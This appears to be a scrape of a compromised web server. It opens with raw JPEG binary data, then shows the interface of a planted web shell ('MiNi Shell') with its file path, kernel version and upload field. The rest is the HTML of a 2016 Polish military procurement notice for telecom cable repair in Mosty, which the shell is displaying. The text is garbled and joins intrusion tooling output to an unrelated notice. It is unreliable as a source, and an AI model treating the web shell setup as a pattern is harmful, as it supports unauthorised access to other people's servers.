JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160823/302345-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 302345 - 2016
              z dnia 2016-08-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Remont kabli telekomunikacyjnych w m. Mosty  przygotowanie dokumentacyjne i wykonanie robót budowlanych. Sprawa nr 17/1/228/16	<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Resortowe Centrum Zarządzania Sieciami i Usługami , krajowy numer identyfikacyjny
              140338549, ul.
              ul. Żwirki i Wigury 
              9/13,
              00-909 
              Warszawa, woj.
              mazowieckie, państwo
              , tel.
              261 847 818, e-mail
              , faks
              261 847 145.
              <br />
              Adres strony internetowej (URL): www.rczsiut.wp.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka Organzacyjna Skarbu Państwa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.rczsut.wp.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />nie</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Forma pisema<br />
                Adres:
                <br />ul. Żirki i Wigury 9/13, 00-909 Warszawa, bud. 30 pok. </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont kabli telekomunikacyjnych w m. Mosty  przygotowanie dokumentacyjne i wykonanie robót budowlanych. Sprawa nr 17/1/228/16	<br /><b>Numer referencyjny: </b>17/1/228/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest remont teletechnicznych wieloparowych linii kablowych w m. Mosty wg poniższych wymogów: 
Zakres rzeczowy zamówienia obejmuje: opracowanie projektów zagospodarowania terenu (PZT) i zgłoszenie zamiaru przeprowadzenia robót budowlanych, wykonanie robót związanych z wymianą kabli teletechnicznych linii kablowych:
- 50 parowej , doziemnej w relacji PG WŁ Mosty  PG WŁ Glewice o długości ok. 4800 m,
- 50 parowej sieci rozdzielczej na terenie kompleksu K-0989 w 8 relacjach o łącznej długości ok. 1050 m,
- przekazanie odzyskanego złomu kablowego do Użytkownika.
Opracowanie:

a)	dokumentacji powykonawczej (plus wersja elektroniczna) w 4 egz. zawierającej: 
- krótki opis zrealizowanego zadania;
- rysunki i schematy wykonanej kanalizacji teletechnicznej, kablowej sieci magistralnej 
i rozdzielczej, sieci strukturalnych itd. wraz z krótkim opisem zastosowanych technologii 
w ich realizacji;
- zestawienie podstawowych materiałów i urządzeń zawierające: pełną nazwę, typ - rodzaj, symbol katalogowy producenta urządzenia, numer seryjny, jednostkę miary, ilość,
- protokoły badań i sprawdzeń; 
- deklaracje zgodności lub certyfikaty zgodności wbudowanych materiałów;
- kartę gwarancyjną wraz z formularzem zgłoszenia awarii, uszkodzenia;
- karty katalogowe/wyrobu wbudowanych materiałów i urządzeń w wersji elektronicznej;
b)	dokumentacji pomiarowej w 1 egz. wraz z kopią na nośniku elektronicznym (w formacie miernika 
- dla pomiarów linii kablowych);
c)	kosztorysu powykonawczego, w 1 egz.;
d)	geodezyjnej inwentaryzacji powykonawczej w 1 egz. w formie: w przypadku robót budowlanych na terenach zamkniętych: 
- zaświadczenie o przyjęciu wybudowanej infrastruktury budowlanej do zasobów geodezyjnych właściwego Zarządu Infrastruktury wraz z kopią zgłoszenia;
- mapa geodezyjnej inwentaryzacji powykonawczej z naniesioną nowo wybudowaną infrastrukturą budowlaną;
- informacja o zgodności usytuowania wybudowanych obiektów budowlanych z projektem zagospodarowania działki lub terenu lub odstępstwach od tego projektu w formie adnotacji zamieszczonej na mapie geodezyjnej inwentaryzacji powykonawczej;
W przypadku robót budowlanych na terenach nie będących własnością MON:
- mapy geodezyjnej inwentaryzacji powykonawczej z naniesioną nowo wybudowaną infrastrukturą budowlaną;
- informacja o zgodności usytuowania wybudowanych obiektów budowlanych z projektem zagospodarowania działki lub terenu lub odstępstwach od tego projektu w formie adnotacji zamieszczonej na mapie geodezyjnej inwentaryzacji powykonawczej;
e)	zestawienia ilościowo-wartościowego (zgodnie z przekazanym wzorem) podstawowych materiałów i urządzeń opracowanego w wersji elektronicznej w programie Excel. 
<br /><br /><b>II.5) Główny kod CPV: </b>45231600-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 120<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Określenie warunków: 
1.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1
      i ust. 5 pkt. 1  Ustawy Pzp.
 Wykonawca je  spełni poprzez złożenia oświadczenia na podstawie art. 25a ust. 1 Ustawy Pzp., że nie zachodzą  
 w stosunku do niego podstawy wykluczenia z postępowania.
2.	Spełniają wymagania określone w art. 22 ust. 1b ustawy  Prawo zamówień publicznych dotyczące:
1)	 posiadania  kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to 
 z odrębnych przepisów.
W postępowaniu o udzielenie zamówienia może wziąść udział Wykonawca, który posiada dokument określony w Ustawy z dnia 05 sierpnia 2010 r. o ochronie informacji niejawnych (Dz.U. z 2010 r. Nr 182, poz. 1228) w zakresie dostępu do informacji niejawnych oznaczonych klauzulą poufne oraz zdolność ich przetwarzania we własnym systemie teleinformatycznym o klauzuli tajności zastrzeżone. Warunek zostanie uznany za  spełniony w przypadku, gdy złożony dokument potwierdzi posiadanie przez Wykonawcę stosownych uprawnień.
<br />
                Informacje dodatkowe
                określono w SWIZ ROZDZIAŁ V:WARUNKI UDZIAŁU W POSTĘPOWANIU<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W postępowaniu o udzielenie zamówienia może wziąć udział Wykonawca, który posiada zdolność kredytową lub dysponuje środkami finansowymi niezbędnymi do sfinansowania wykonania zamówienia 
w wysokości min. 400 000,00 zł przy uwzględnieniu zobowiązań i należności Wykonawcy
Wykonawca je  spełni poprzez złożenia oświadczenia na podstawie art. 25 a ust. 1 Ustawy Pzp., że spełnienia warunków udziału.
<br />
                Informacje dodatkowe
                określono w SWIZ ROZDZIAŁ V:WARUNKI UDZIAŁU W POSTĘPOWANIU<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi wykazać:
a)	wiedzę i doświadczenie, w wykonaniu (zakończenia) w okresie ostatnich 5  lat przed upływem  terminu
    składania  wniosków o dopuszczenie do udziału  a jeżeli okres prowadzenia działalności jest krótszy 
    w tym okresie co najmniej 
                     - 2 zadaniami (robotami budowlanymi) obejmujące swoim zakresem budowę teletechnicznych linii 
                          kablowych  o wartości min. 300 000,00 zł. netto każda. 
            Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powyższe warunki wykazują w ten 
            sposób, że jeden z partnerów Konsorcjum musi wykazać się wiedzą i doświadczeniem w realizacji: 
             - 2 zadaniami (robotami budowlanymi) obejmujące swoim zakresem budowę teletechnicznych linii kablowych 
                  o wartości min. 300 000,00. zł. netto każda.
b)	 że dysponuje lub będzie dysponował osobami skierowanych do realizacji zamówienia publicznego, 
w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia  publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:
	kierownik budowy (1 osoba) - posiadający prawo do pełnienia samodzielnych funkcji w budownictwie, 
tj. uprawnienia budowlane do kierowania robotami w specjalności telekomunikacyjnej (co najmniej) 
w ograniczonym zakresie uprawniające do kierowania robotami budowlanymi związanymi 
z obiektem budowlanym wraz z infrastrukturą telekomunikacyjną, w odniesieniu do obiektu budowlanego, takiego jak: lokalne linie i instalacje, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2013, poz. 1409) lub odpowiednie uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w zakresie odpowiadającym uprawnieniom w specjalności telekomunikacyjnej bez ograniczeń uprawniające do kierowania robotami budowlanymi w zakresie telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą; 
	projektant  (1 osoba) - posiadający prawo do pełnienia samodzielnych funkcji w budownictwie, 
tj. uprawnienia budowlane w specjalności telekomunikacyjnej do projektowania obiektu budowlanego 
w zakresie telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą, w odniesieniu do obiektów budowlanych, takich jak: linie, instalacje i urządzenia liniowe oraz urządzenia stacyjne, bez ograniczeń;
	geodeta (1 osoba)- posiadający  prawo do pełnienia samodzielnych funkcji w budownictwie 
tj. uprawnienia zawodowe w zakresie - geodezyjne pomiary sytuacyjno-wysokościowe, realizacyjne
 i inwentaryzacyjne, prawo do pełnienia samodzielnych funkcji technicznych w budownictwie określone wyżej mogą również wykazać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych tj. min. w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63 poz. 394) oraz ustawie z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2013 r. poz. 932 z późn. zm.). 
	monterzy w specjalnościach: monter telekomunikacyjnych linii kablowych,
	 pracownicy odpowiedzialni za ochronę informacji niejawnych wyszczególnieni w załączniku nr 2 do ogłoszenia o zamówieniu. Wszystkie wyżej wymienione osoby powinny spełnić warunki z ochrony informacji niejawnych opisane w zał. nr 2 do ogłoszenia o zamówieniu, który znajduje się na stronie internetowej Zamawiającego. Zamawiający wymaga, aby osoby wykazane w wykazie Wniosku 
o dopuszczenie do udziału, w celu wykazania spełnienia warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia uczestniczyły w jego realizacji. Zamawiający nie dopuszcza łączenia ról osób pełniących funkcję kierownika budowy z funkcją kierownika robót. Na etapie realizacji zamówienia zmiana osoby wskazanej w wykazie będzie możliwa na wniosek wykonawcy, uzasadniony obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez zamawiającego kandydatury innej osoby spełniającej warunki zawarte w   ogłoszeniu o zamówieniu.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                określono w SWIZ ROZDZIAŁ V:WARUNKI UDZIAŁU W POSTĘPOWANIU</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie Wykonawcy o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 i ust. 5 pkt. 1.
Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt. 1 ustawy Pzp, 
albo 
ze względu na możliwość wydrukowania ww. dokumentu samodzielnie przez Zamawiającego (dostępności   dokumentu w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych), Wykonawca ma obowiązek wskazać na odrębnym oświadczeniu stanowiącym załącznik nr 3 do  Wniosku o dopuszczenie do udziału w postepowaniu  podstawowe informacje, które posłużą Zamawiającemu do pobrania i wydrukowania odpowiedniego odpisu z rejestru. Jeżeli dane będą prawidłowo wskazane, Zamawiający samodzielnie znajdzie i wydrukuje taki dokument bez obowiązku jego dołączenia do Wniosku 
w sprawie zakwalifikowania do udziału w postepowaniu przez Wykonawcę (wzór druku nr 2).
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie Wykonawcy składane na podstawie art. 25a ust. 1 ustawy z dnia 
29 stycznia 2014 r dotyczące spełnienia warunków udziału w postępowaniu i kryteriów selekcji. 
Niniejsze Oświadczenie składa każdy  Wykonawca  a wykonawcy którzy wspólnie ubiegają  się o udzielenie zamówienia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału 
w postępowaniu lub kryteriów selekcji. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu    spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu lub kryteriów selekcji zamieszcza informacje o tych podmiotach w oświadczeniu o który mowa (wzór druku nr 3).
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />1.	Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu: 8.
2.	Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu 
o zamówieniu
Zamawiający zastrzega, że ocenie punktowej w celu ustalenia listy Wykonawców zaproszonych do składania ofert podlegać będą jedynie własne zdolności techniczne i zawodowe  Wykonawcy (lub Wykonawców występujących wspólnie) - Zamawiający nie dopuszcza w tym zakresie posługiwania się zdolnościami technicznymi 
lub zawodowymi  innych podmiotów na zasadzie art. 22a ust. 1 ustawy Pzp. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu, okaże się być większa niż 8 zaproszenie do udziału w postępowaniu otrzymają Wykonawcy, którzy otrzymali najwyższą ocenę spełnienia poniższego warunku: Wykonawca, który wykaże największą ilość wykonanych należycie robót budowlanych obejmujących swoim zakresem budowę: 
a)	teletechnicznych linii kablowych o wartości min. 300 000,00 zł. netto  każda, 
otrzyma maksymalnie -100,00 pkt. natomiast pozostali proporcjonalnie mniej, wg formuły: Wp = Wpw.bad : Wpmax x 1000,00,
gdzie:
Wp. - ilość punktów przyznana za ocenę spełnienia warunku
 Wp. bad. - ilość kwalifikowanych robót budowlanych wykazanych we wniosku badanym; 
Wp. max. - maksymalna wykazana ilość kwalifikowanych robót budowlanych spośród wszystkich wniosków; 
Zamawiający zaprosi do składania ofert ośmiu Wykonawców, którzy otrzymali najwyższą liczbę punktów 
z zastrzeżeniem, że: 
1) jeśli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie mniejsza lub równa
      8, Zamawiający zaprosi do składania ofert wszystkich Wykonawców, którzy spełniają warunki udziału 
     w postępowaniu,
 2) jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu będzie większa niż 8, 
      Zamawiający zaprosi do składania ofert 8 Wykonawców, którzy otrzymali najwyższą liczbę punktów, 
      obliczoną zgodnie z wyżej opisaną zasadą,
 3) w przypadku otrzymania takiej samej liczby punktów, przez ósmego i kolejnych Wykonawców Zamawiający
     zakwalifikuje wszystkich wykonawców, którzy otrzymali liczbę punktów wyższą i równą   jak  ósmy Wykonawca.

</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1.	W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału 
w postepowaniu Wykonawca wraz z wnioskiem o dopuszczenie do udziału w postępowaniu dołącza oświadczenie wykonawcy składane na podstawie art. 25 ust 1 Ustawy Pzp dotyczące przesłanek wykluczenia 
z postepowania oraz oświadczenie wykonawcy składane na podstawie art. 25 ust 1 Ustawy Pzp dotyczące spełnienia warunków udziału w postępowaniu i selekcji.
2.	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału 
w postępowaniu lub kryteriów selekcji  zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w ust. 1 (załącznik nr 1 do wniosku o dopuszczenie do udziału w postepowaniu).
